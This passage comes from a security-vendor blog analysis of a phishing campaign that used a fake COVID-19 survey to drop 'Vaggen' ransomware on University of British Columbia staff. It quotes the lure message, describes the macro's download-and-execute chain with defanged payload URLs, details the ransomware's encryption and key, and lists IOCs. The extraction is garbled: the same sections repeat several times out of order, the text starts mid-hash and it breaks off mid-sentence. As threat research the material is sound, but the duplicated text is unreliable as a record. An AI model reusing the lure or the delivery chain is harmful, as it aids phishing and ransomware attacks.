cc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3413 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3414 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3415 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3416 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3417 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3418 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3419 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3420 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3421 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3422 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3423 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3424 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3425 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3426 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3427 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3428 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3429 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3430 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3431 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3432 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3433 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3434 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3435 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3436 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3437 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3438 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3439 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3440 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3441 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3442 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3443 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3444 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3445 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3446 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3447 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3448 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3449 of 